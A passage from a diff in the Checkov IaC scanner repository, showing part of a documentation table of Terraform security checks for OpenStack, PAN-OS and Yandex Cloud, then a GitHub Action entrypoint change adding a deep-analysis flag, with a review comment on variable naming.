[SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 2048 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 2049 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | 
Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | +| 2050 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | +| 2051 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | +| 2052 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | +| 2053 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | +| 2054 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 2055 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 2056 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | 
[PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 2057 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 2058 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 2059 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 2060 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 2061 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 2062 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 2063 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within 
security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 2064 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 2065 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 2066 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 2067 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 2068 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 2069 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 2070 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec 
profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 2071 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 2072 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 2073 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 2074 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2075 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2076 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2077 | CKV_PAN_15 | resource | 
panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 2078 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 2079 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | +| 2080 | CKV_TF_2 | module | module | Ensure Terraform module sources use a tag with a version number | Terraform | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py) | +| 2081 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2082 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2083 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2084 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. 
| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2085 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2086 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2087 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2088 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2089 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2090 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | +| 2091 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. 
| Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | +| 2092 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | +| 2093 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | +| 2094 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | +| 2095 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | +| 2096 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | +| 2097 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | +| 2098 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. 
| Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | +| 2099 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | +| 2100 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2101 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2102 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2103 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2104 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2105 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2106 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2107 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2108 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 2109 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 2110 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | +| 2111 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | +| 2112 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. 
| Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | +| 2113 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | +| 2114 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | +| 2115 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | +| 2116 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | +| 2117 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 2118 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. 
| Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 2119 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | +| 2120 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 2121 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 2122 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2123 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2124 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. 
Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) |
+| 2125 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) |
+| 2126 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) |
+| 2127 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) |
 ---
diff --git a/github_action_resources/entrypoint.sh b/github_action_resources/entrypoint.sh
index a9072eacf14..59a9c5c0f74 100755
--- a/github_action_resources/entrypoint.sh
+++ b/github_action_resources/entrypoint.sh
@@ -68,6 +68,10 @@ if [ -n "$INPUT_SKIP_DOWNLOAD" ] && [ "$INPUT_SKIP_DOWNLOAD" = "true" ]; then
 SKIP_DOWNLOAD_FLAG="--skip-download"
 fi
 
+if [ -n "$INPUT_DEEP_ANALYSIS" ] && [ "$INPUT_DEEP_ANALYSIS" = "true" ]; then
+ INPUT_DEEP_ANALYSIS_FLAG="--deep-analysis"
+fi
+
 if [ -n "$INPUT_LOG_LEVEL" ]; then
 export LOG_LEVEL=$INPUT_LOG_LEVEL
 fi
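Review bot: The new variable `INPUT_DEEP_ANALYSIS_FLAG` breaks the naming the rest of this script uses: raw action inputs carry the `INPUT_` prefix (`INPUT_SKIP_DOWNLOAD`, `INPUT_LOG_LEVEL` on the context lines) and the derived CLI flags do not (`SKIP_DOWNLOAD_FLAG`), so a reader will take the new name for an input rather than a value the script computed. Rename it `DEEP_ANALYSIS_FLAG` here and at its uses in the command lines further down: `DEEP_ANALYSIS_FLAG="--deep-analysis"`. The `[ -n "$INPUT_DEEP_ANALYSIS" ]` test is redundant with the `= "true"` comparison beside it, but it mirrors the existing lines, so leave it unless those are cleaned up at the same time.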
@@ -196,11 +200,11 @@ else
 fi
 
 # Build command
 if [ -n "$API_KEY_VARIABLE" ]; then
- echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG"
- CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG)
+ echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG"
+ CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG)
 else
- echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG"
- CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG)
